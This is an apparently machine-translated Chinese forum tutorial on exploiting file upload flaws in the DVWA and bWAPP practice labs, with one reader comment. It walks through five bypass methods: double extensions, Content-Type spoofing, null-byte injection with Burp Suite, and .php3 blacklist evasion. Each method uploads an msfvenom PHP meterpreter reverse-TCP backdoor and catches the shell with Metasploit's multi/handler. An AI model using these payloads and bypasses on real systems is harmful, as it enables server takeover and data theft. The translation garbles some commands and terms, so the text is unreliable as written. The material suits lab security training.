kali实战教程:文件上传漏洞利用的5种方法

文件上载漏洞是基于Web的应用程序的主要问题。在许多Web服务器中,此漏洞完全取决于目的,允许攻击者上载其中可以在服务器上执行的恶意代码的文件。攻击者可能会将网络钓鱼页面放入网站或破坏网站。
攻击者可能会向其他人透露Web服务器的内部信息,并且有些机会可能会由未经授权的人员将非正式的敏感数据。
在本教程中,我们将讨论各种类型的文件上载漏洞,然后尝试利用它们。您将学习不同的注入技术,以便在Web服务器中上传php的恶意文件并利用它们。

基本文件上传
在这种情况下,一个简单的PHP文件将在没有任何限制的情况下上传到Web服务器上,此处服务器不会检查要上载的内容类型或文件扩展名。
例如,如果服务器允许上传文本文件或图像,这被视为数据,如果安全参数较低,而对内容类型或文件名没有限制,那么您可以轻松绕过被视为应用程序的恶意php文件网络服务器。
开始吧!!!
单击  DVWA Security  并将网站安全级别设置为  
在kali linux中打开终端并通过以下命令创建php后门
msfvenom -p php / meterpreter / reverse_tcp lhost = 192.168.1.104 lport = 4444 -f raw
突出显示的代码复制  并  粘贴到leafpad中,并像PHP扩展名  一样保存  为  imgphp在桌面上。
加载metasploit框架  类型msfconsole并  启动多处理程序
kali实战教程:文件上传漏洞利用的5种方法

回到你DVWA实验室,  点击  到  文件上传  的漏洞菜单选项。
现在  点击  在  浏览标签  浏览  img.php  文件上传的Web服务器上,并  点击  上  ,将上传文件的Web服务器上。
kali实战教程:文件上传漏洞利用的5种方法
上传PHP文件后,它将显示文件成功上传的目录路径,现在复制所选部分并将粘贴到URL中以执行它。
容易被破解/上传/ img.php
kali实战教程:文件上传漏洞利用的5种方法
msf>使用multi / handler
msf exploit(handler )> set payload php / meterpreter / reverse_tcp
msf exploit(handler )> set lhost 192.168.1.104
msf exploit(handler )> set lport 4444
msf exploit(处理程序)> exploit
meterpreter> sysinfo
您可以观察到,我已经在metasploit上获得了受害者PC的计时器会话1
kali实战教程:文件上传漏洞利用的5种方法


双延伸注射技术

单击  DVWA Security  并设置网站  安全级别媒体
在这里,我们遇到了检查文件扩展名的情况。在中等安全性中,它仅允许将.jpeg和.png扩展文件上载到Web服务器上,并在Web服务器中上载时限制具有单个文件扩展名的其他文件。现在有一些技术可以绕过Web服务器中的恶意PHP文件。
kali实战教程:文件上传漏洞利用的5种方法
它试图通过插入带有文件名的多个扩展来隐藏文件的真实性质,这会对安全性参数造成混淆。例如,img1.php.png看起来像png图像,这是一个数据而不是应用程序,但是当文件上传双扩展名时,它将执行php文件,这是一个应用程序。
我们继续吧!
重复相同的过程,使用msfvenom 创建php后门,现在将文件保存为   桌面上的img1.php.png并在后台运行多处理程序
由于此文件将以中等安全性上载,这与低安全性略有不同,因为这显然会检查文件的扩展名以及读取文件名。
点击文件上传的漏洞菜单选项。再次单击浏览按钮来浏览img1.php.png文件上传。现在启动burp suit e并在代理选项卡下进行拦截。不要忘记设置浏览器的手动代理和点击载。
kali实战教程:文件上传漏洞利用的5种方法
当您单击上载按钮时,拦截选项卡将用于捕获post方法的已发送请求。现在将img1.php.png更改  为  获取数据中的img1.php。
kali实战教程:文件上传漏洞利用的5种方法
在上传PHP文件之前比较更改。改变后点击上  向前  上传PHP文件目录。
kali实战教程:文件上传漏洞利用的5种方法
上传PHP文件后,它将显示文件成功上传的目录路径,现在复制所选部分并将粘贴到URL中以执行它。
容易被破解/上传/ img1.php
kali实战教程:文件上传漏洞利用的5种方法
当您在浏览器中运行URL时,这将提供  一个meterpreter会话2
meterpreter> sysinfo
kali实战教程:文件上传漏洞利用的5种方法


内容类型文件上传

请求标头中的“Content-Type”实体指示消息内容的内部媒体类型。有时,Web应用程序使用此参数来将文件识别为有效文件。例如,他们只接受“text-plain”的“Content-Type”文件。通过使用Web代理更改请求标头中的此参数,可以绕过此保护。
再次重复相同的过程,使用msfvenom 创建php后门,现在文件保存为   桌面上的img2.php,并在后台运行多处理程序
kali实战教程:文件上传漏洞利用的5种方法
启动burp suite并重复获取已发送请求的过程。在屏幕截图中,您可以阅读php文件的内容类型; 现在将此内容类型application / x-php更改为image / png以上传您的php文件。

从下面的图像中,您可以感知内容类型中的操作,即内容类型注入技术。
kali实战教程:文件上传漏洞利用的5种方法kali实战教程:文件上传漏洞利用的5种方法
现在复制选定的部分并在URL中过去以执行它。
容易被破解/上传/ img2.php
kali实战教程:文件上传漏洞利用的5种方法
当您在浏览器中运行URL时,这将提供  一个meterpreter会话3
meterpreter> sysinfo
kali实战教程:文件上传漏洞利用的5种方法

空字节注入
Null Byte Injection是一种利用技术,它使用URL编码的空字节字符(即%00或十六进制的0x00)来表示用户提供的数据。URL中的空字节由'%00'表示,其中ASCII是“”(空格)。此注入过程可以改变应用程序的预期逻辑,并允许恶意攻击者未经授权访问系统文件。
现在,您将看到我在扩展名末尾插入了一个字符串,并将该字符串更改为其十六进制值,然后将该十六进制值替换为空字节字符'%00'。插入空字节值的原因是,某些应用程序服务器脚本语言仍然使用c / c ++库来检查文件名和内容。在c / c ++中,以/ 00结尾的行称为空字节。
因此,当编译器在字符串的末尾研究空字节时,它将假定它已到达字符串的结尾并停止进一步读取字符串。
现在创建PHP 后门msfvenom现在将文件保存为  img3.php.jpg  台式机和运行多处理器的背景。
kali实战教程:文件上传漏洞利用的5种方法
启动burp suite并重复获取已发送请求的过程。它看起来像双扩展文件,但这里的技术与双扩展文件上传完全不同。
kali实战教程:文件上传漏洞利用的5种方法
添加任何字符串或字母,如此处的屏幕截图所示,您会注意到我在img3.php.jpg中将突出显示的文本更改为img3.phpD.jpg,现在按照下一步将该字符串修改为null字节。
kali实战教程:文件上传漏洞利用的5种方法
在下一步中,我们将解码插入的字符串; 现在解码你的字符串或字母,因为我给'D '现在解码为十六进制将告诉它的十六进制值,从截图你可以读取它的十六进制值是44。
kali实战教程:文件上传漏洞利用的5种方法
现在点击十六进制下拦截选项,将显示截取的数据的十六进制值。在这里,您可以读取我突出显示的文件名的十六进制值。为了使用null,从空字节值00 替换十六进制值44
kali实战教程:文件上传漏洞利用的5种方法
现在,您可以从给定的屏幕截图中感知更改,我在插入的字符串的十六进制值的位置注入了空值。
kali实战教程:文件上传漏洞利用的5种方法
再一次,您将查看原始数据,现在您将发现字符串“D”已更改为空字节值。
kali实战教程:文件上传漏洞利用的5种方法
现在转发截获的数据以通过空字节注入技术利用文件上载。我们绕过中安全性现在复制上传的路径过去它的URL来执行它。
kali实战教程:文件上传漏洞利用的5种方法
当您运行路径时,它将为您提供metasploit的反向连接,并且从给定的屏幕截图中您可以看到我也有了metpreter会话4
kali实战教程:文件上传漏洞利用的5种方法

黑名单文件扩展名
  下一个目标是bwapp,这是另一个Web服务器设置安全级别介质,从列表框中选择您的错误并选择Unrestricted File Upload,然后单击hack
某些服务器端脚本语言检查文件名的.php扩展名,并仅允许那些不包含.php扩展名的文件。 在这里,我们可以通过将大量字母更改为其大写形式来注入我们的文件,以绕过区分大小写的规则,例如PHp或PHP3。

kali实战教程:文件上传漏洞利用的5种方法
现在使用msfvenom创建php后门,现在将文件保存为img4.php3在桌面上并在后台运行多处理程序。
然后浏览img4.php3以在Web服务器上传并单击上传选项卡。 在中等安全性中,它将允许php文件在Web服务器上上传,从给定的屏幕截图中,您可以看到我的php文件已成功上传。 现在单击此处的链接,您将在多处理程序中获得反向连接。kali实战教程:文件上传漏洞利用的5种方法
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.104
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
Great!!!    你可以看到我有一个测试会话1
kali实战教程:文件上传漏洞利用的5种方法
转载请注明本文链接: http://www.mayidui.net/t2233.html

喜欢夏天 蚁侯 沙发

2019-01-07 10:48

不怎么看得懂啊
转载请注明本文链接: http://www.mayidui.net/t2233.html
游客
登录后才可以回帖,登录 或者 注册